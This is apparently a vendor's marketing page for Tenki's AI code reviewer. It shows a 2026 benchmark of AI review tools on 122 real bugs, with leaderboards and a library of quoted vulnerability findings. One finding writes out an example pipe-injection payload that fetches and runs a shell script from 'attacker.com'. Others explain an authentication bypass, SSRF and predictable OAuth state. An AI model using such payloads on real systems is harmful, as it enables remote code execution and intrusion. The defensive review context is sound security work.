Introducing Tenki's code reviewer: deep, context-aware reviews that actually find bugs.Try it for Free
AI Code Review Benchmarks · 2026

How well do AI code reviewers catch real bugs?

In this independent 2026 benchmark of 6 leading AI code review tools, Tenki catches 84 of 122 real, production bugs across 50 pull requests from cal.com, Sentry, Grafana, Keycloak, and Discourse, graded per finding by a 3-judge LLM panel. That's 1.9× the next-best reviewer.

Real bugs caught
84 / 122
Tenki #1 reviewer · finding-level scoring
7
tools
122
bugs
5
repos
350
reviews
Methodology

How we benchmarked AI code reviewers

Every pull request contains a real, merged bug-fix from an open-source codebase. We replay the bug-introducing diff into a clean fork and let each tool review it with its default configuration. Reviews are then graded by a 3-LLM judge panel using majority vote. No synthetic bugs, no repo-specific tuning.

01 · SOURCES

50 bug-fix PRs from 5 open-source repositories

Real merged fixes from cal.com (TypeScript), sentry (Python), grafana (Go), keycloak (Java), and discourse (Ruby). All five major server-side languages are represented in the bug set.

02 · REPLAY

Real bugs reintroduced, not invented

The pre-fix diff is replayed against every tool with default settings: no custom rules, no repo-specific tuning, and full repository context for every reviewer. Every tool sees the same code at the same point in history.

03 · JUDGING

Per-finding 3-judge LLM majority vote

Each individual bug is scored separately. A finding is counted as caught only when a line-level comment explicitly identifies the faulty code and explains the impact, and the majority of three independent LLM judges agrees. Per-PR scoring is avoided because it over-credits drive-by comments.

Overall performance

Leaderboard: recall, precision, and F1 across every real bug

Each individual bug is scored, not each pull request. Recall is the share of real bugs caught. Precision is the share of a tool's comments that flag a real bug. F1 is the harmonic mean of recall and precision and drives the ranking.

68.9%recall
Tenki #1 reviewer · caught 84 of 122 real bugs
F1 41.7·precision 29.9%
Reviewer
Recall
Precision
F1
Tenki#1
68.9%(84/122)
29.9%
41.7
CodeRabbit
28.7%(35/122)
25.0%
26.7
Greptile
36.1%(44/122)
15.9%
22.1
Copilot
24.6%(30/122)
18.9%
21.4
Graphite
3.3%(4/122)
50.0%
6.2
Sorted by F1 · 3 LLM judges · default tool configurations

Higher-precision tools post fewer comments overall. Tenki's higher comment volume drives both higher recall and lower precision; see methodology for how each metric is computed.

Coding agents · for reference

Coding agents are bundled into the IDE and review their own work in-loop, not post-hoc on a PR diff. Shown here for context, not as an apples-to-apples comparison.

Reviewer
Recall
Precision
F1
Devin
coding agent
36.1%(44/122)
47.3%
40.9
Cursor
coding agent
32.0%(39/122)
51.3%
39.4
Head-to-head

Tenki vs Devin: the closest AI code reviewer

Devinis the runner-up by F1 score in this benchmark. Tenki's lead is widest at the finding level, where recall (the share of real bugs caught) matters most for engineering teams who need coverage they can trust.

Metric
Tenki
Devin
Δ
Bugs caught
84
44
+40
Recall
68.9%
36.1%
+32.8pp
Precision
29.9%
47.3%
-17.4pp
F1 score
41.7
40.9
+0.8pp
Critical bugs caught
57.1%
0.0%
+57.1pp
PRs where only Tenki found a bug
1
n/a
+1
By Severity

Do AI code reviewers catch the bugs that actually matter?

Catch rate broken down by the severity of the individual finding. Critical bugs cause outages, data loss, or auth bypass. High-severity bugs break major user-facing flows. Medium bugs degrade behavior without breaking it. The severity that matters most for production reliability is the first column.

Critical7 bugs
Greptile
71% (5/7)
Tenki
57% (4/7)
CodeRabbit
43% (3/7)
Copilot
43% (3/7)
Devin
29% (2/7)
Cursor
14% (1/7)
Graphite
0% (0/7)
High53 bugs
Tenki
74% (39/53)
Devin
45% (24/53)
Cursor
34% (18/53)
Greptile
32% (17/53)
CodeRabbit
25% (13/53)
Copilot
25% (13/53)
Graphite
2% (1/53)
Medium52 bugs
Tenki
69% (36/52)
Greptile
37% (19/52)
Cursor
35% (18/52)
CodeRabbit
33% (17/52)
Devin
29% (15/52)
Copilot
23% (12/52)
Graphite
4% (2/52)
Low10 bugs
Tenki
50% (5/10)
Devin
30% (3/10)
Greptile
30% (3/10)
CodeRabbit
20% (2/10)
Copilot
20% (2/10)
Cursor
20% (2/10)
Graphite
10% (1/10)
By Repository

Performance per codebase: cal.com, Sentry, Grafana, Keycloak, Discourse

Per-repository recall: the share of real bugs each AI code reviewer caught in each codebase. The Tenki Δ column is the gap, in percentage points, between Tenki and the next-best reviewer for that repo.

RepositoryTenkiCodeRabbitCopilotCursorDevinGraphiteGreptileTenki Δ
cal.com
33 bugs
91%
30/33
21%
7/33
21%
7/33
30%
10/33
33%
11/33
0%
0/33
30%
10/33
+57.6pp
sentry
31 bugs
55%
17/31
16%
5/31
6%
2/31
13%
4/31
29%
9/31
0%
0/31
13%
4/31
+25.8pp
discourse
22 bugs
73%
16/22
36%
8/22
32%
7/22
32%
7/22
27%
6/22
5%
1/22
50%
11/22
+22.7pp
keycloak
15 bugs
67%
10/15
40%
6/15
47%
7/15
47%
7/15
27%
4/15
0%
0/15
53%
8/15
+13.3pp
grafana
21 bugs
52%
11/21
43%
9/21
33%
7/21
52%
11/21
67%
14/21
14%
3/21
52%
11/21
-14.3pp
Case Library

Every real bug, every reviewer verdict

One row per real bug. 122 distinct findings across 50 production pull requests. Each cell shows whether that AI code reviewer flagged that specific finding. Yes/No is decided by a 3-LLM majority vote; hover a cell for judge-by-judge votes, or click ✓/✕ to open the actual review on GitHub. Filter by severity or repository below. Critical bugs are shown by default.

#Repo · PRFindingSeverityTenkiCodeRabbitCopilotCursorDevinGraphiteGreptile
001cal.com · #3
Backup-code login bypasses password verification
packages/features/auth/lib/next-auth-options.ts authorize(): if (user.password && !credentials.totpCode) { // verify password via verifyPassword(credentials.password, user.password) } if (user.twoFactorEnabled && credentials.backupCode) { // accept backup code as 2FA factor } else if (user.twoFactorEnabled) { // verify totpCode } Submitting `credentials.totpCode = <anything truthy>` (it does not need to be valid because the new branch only consumes backupCode) makes `!credentials.totpCode` false and skips the password block entirely. The backup-code branch then accepts the credential and the user is logged in. Effect: an attacker who has any single backup code can sign in without the account password — backup codes become permanent password replacements rather than recovery factors. The fix is to verify the password unconditionally when user.password is set (regardless of totpCode/backupCode presence) and only use backupCode in place of totpCode, not in place of password.
Critical
002cal.com · #8
Missing `prisma` import in SalesforceCalendarService causes runtime crash+ext
**🚨 Missing `prisma` import in SalesforceCalendarService causes runtime crash** (bug) In `packages/app-store/salesforce/lib/CalendarService.ts`, `prisma.credential.update` is called on line 96 to persist refreshed tokens, but `prisma` is never imported. There is no `import prisma from "@calcom/prisma"` in the file. This will throw a `ReferenceError: prisma is not defined` at runtime whenever Salesforce credentials need a token refresh. **💡 Suggestion**: Add `import prisma from "@calcom/prisma";` to the import block at the top of the file. <details> <summary>📋 Prompt for AI Agents</summary> In packages/app-store/salesforce/lib/CalendarService.ts, add a missing import for prisma. After the existing import block (around line 20), add: `import prisma from "@calcom/prisma";`. This is required because `prisma.credential.update` is called on line 96 to persist refreshed tokens, but the module is never imported, causing a ReferenceError at runtime. </details>
Critical
003discourse · #4
best.html.erb closes if/else with `<%- end if %>` — invalid Ruby, view crashes
app/views/embed/best.html.erb (added in this PR) opens an if/else at lines 2-6: <%- if @topic_view.posts.present? %> ... <%- else %> ... <%- end if %> The `end if` form is Ruby's trailing-if statement modifier and requires an expression after `if` (e.g. `end if some_cond`). With no expression the template compiles to invalid Ruby and rendering raises SyntaxError. The embed view is the entry point for the new embeddable-comments feature, so any host page that embeds Discourse comments will fail to render the iframe. Fix: change to `<%- end %>`.
Critical
004discourse · #4
SSRF via user-controlled embed_url triggers open() to arbitrary URL+ext
**🚨 SSRF via user-controlled embed_url triggers open() to arbitrary URL** (security) In `EmbedController#best` (line 9), the `embed_url` parameter comes directly from user-supplied query parameters. When no existing topic embed is found, this value is passed verbatim to `Jobs.enqueue(:retrieve_topic, embed_url: embed_url)`. Inside `Jobs::RetrieveTopic#execute`, it is passed to `TopicRetriever.new(@embed_url)`, which calls `TopicEmbed.import_remote(user, @embed_url)`, which calls `open(url).read` (Ruby's `Kernel#open` / `open-uri`). Although `TopicRetriever#invalid_host?` checks that the URL's host matches `SiteSetting.embeddable_host`, this check only runs for pre-validated embeds after the job is enqueued — the URL is already accepted by the controller before any host validation occurs (the controller only checks the HTTP Referer header, not the embed_url itself). More critically, `Kernel#open` also accepts pipe-prefixed strings (`|command`) on older Ruby/open-uri combinations that allow OS command execution. Even if host validation were reliable, a URL with a valid host prefix but path traversal (e.g. query string exploits) can reach internal services. **💡 Suggestion**: Validate `embed_url` against the configured `embeddable_host` in the controller before enqueuing the job, not just in the retriever. Use `URI.parse` and compare the host explicitly, and reject any URL whose scheme is not `http` or `https`. Additionally, replace `open(url)` in `import_remote` with `Net::HTTP` or a whitelisted HTTP client that cannot be used for file/pipe access. <details> <summary>📋 Prompt for AI Agents</summary> In app/controllers/embed_controller.rb, before calling Jobs.enqueue at line 15, add host validation of embed_url: parse it with URI.parse, verify the scheme is http/https and the host matches SiteSetting.embeddable_host, and raise Discourse::InvalidAccess if either check fails. In app/models/topic_embed.rb at line 48, replace `open(url).read` with an explicit HTTP fetch using Net::HTTP or Faraday so that file:// and pipe-exec URIs are never processed. </details>
Critical
005discourse · #4
SSRF and RCE via Kernel#open with attacker-controlled URL from Disqus XML+ext
**🚨 SSRF and RCE via Kernel#open with attacker-controlled URL from Disqus XML** (security) The PR replaces `PostCreator` with `TopicEmbed.import_remote(user, t[:link], ...)` at line 148. The value `t[:link]` is read directly from the `<link>` element of the Disqus XML export file (parsed at `disqus.thor:58`). Inside `TopicEmbed.import_remote` (topic_embed.rb:48), Ruby's `Kernel#open(url)` is called with this attacker-controlled value **before** any URL validation. Ruby's `Kernel#open` has two critical behaviours beyond HTTP: 1. **Remote Code Execution**: if the URL begins with `|`, it is interpreted as a shell command. A Disqus XML containing `<link>|curl attacker.com/shell.sh | bash</link>` would execute arbitrary shell commands on the import host. 2. **SSRF / local file read**: URLs with `file://` scheme or internal addresses (e.g., `http://169.254.169.254/`) allow reading arbitrary local files or probing internal services. The `https?://` guard in `TopicEmbed.import` (line 11) does NOT protect against this because `open(url)` in `import_remote` is called at line 48 **before** `import` is invoked at line 52. The `TopicRetriever` code path validates the host against `SiteSetting.embeddable_host`, but the Disqus importer bypasses that validation entirely. **💡 Suggestion**: Replace `Kernel#open(url)` with an explicit HTTP client call (e.g., `Net::HTTP.get(URI(url))` or `open-uri` with explicit `URI.open`) and validate the URL scheme before fetching. Add a guard at the start of `import_remote` that rejects non-http(s) URLs (matching the guard already present in `import`). Additionally, validate `t[:link]` in `disqus.thor` before passing it to `import_remote`. ```suggestion doc = Readability::Document.new(URI.open(url).read, ``` <details> <summary>📋 Prompt for AI Agents</summary> In app/models/topic_embed.rb, the `import_remote` method at line 44 uses Ruby's `Kernel#open(url)` at line 48 to fetch a URL that can originate from an attacker-controlled Disqus XML file (via lib/tasks/disqus.thor line 148). Ruby's Kernel#open executes shell commands when the string starts with '|', enabling RCE. Fix this by: (1) adding a URL scheme check at the top of `import_remote` identical to the one in `import` (line 11): `return unless url =~ /^https?:\/\//`; (2) replacing `open(url)` with `URI.open(url)` (from OpenURI) or an explicit Net::HTTP call to avoid the shell-dispatch behaviour of Kernel#open. Also add `require 'open-uri'` if not already present. </details>
Critical
006keycloak · #6
GroupPermissionsV2.canManage() accepts VIEW scope — privilege escalation
services/src/main/java/org/keycloak/services/resources/admin/permissions/GroupPermissionsV2.java around line 70: public boolean canManage() { if (root.hasOneAdminRole(AdminRoles.MANAGE_USERS)) return true; return hasPermission(null, AdminPermissionsSchema.VIEW, AdminPermissionsSchema.MANAGE); } The corresponding per-group `canManage(GroupModel group)` later in the same file (~line 78) correctly does `hasPermission(group.getId(), MANAGE)`. The no-arg variant must mirror that — a manage operation must require a manage scope. Accepting VIEW here means: a user granted ONLY the all-groups VIEW permission satisfies the canManage() check and can then call admin endpoints that gate on requireManage()/canManage() (GroupsResource.addTopLevelGroup, GroupResource cross-group moves, etc.). The fix is `hasPermission(null, AdminPermissionsSchema.MANAGE)`.
Critical
007sentry · #4
OAuth state parameter is a deterministic pipeline.signature, not a per-session nonce
src/sentry/integrations/github/integration.py introduces OAuthLoginView with `state = pipeline.signature` and validates the callback via `request.GET.get('state') != pipeline.signature`. Per src/sentry/pipeline/base.py:133, pipeline.signature is computed as `md5_text(*[f'{module}.{cls}' for v in self.pipeline_views]).hexdigest()` — a deterministic hash of the pipeline view class names. The value is identical for every Sentry installation that uses the same GitHub provider pipeline, so an attacker who knows the (open-source) pipeline composition can predict the state value, craft a callback URL with a stolen authorization code, and bind an attacker-controlled GitHub installation to the victim's session. The fix is to generate a per-session cryptographic nonce (e.g. secrets.token_urlsafe), store it in pipeline state, and compare against that. Recommended additions: PKCE, exact-match redirect URI validation, and rate-limit the callback.
Critical
Caught (majority vote)MissedHover a mark for judge votes and comment counts.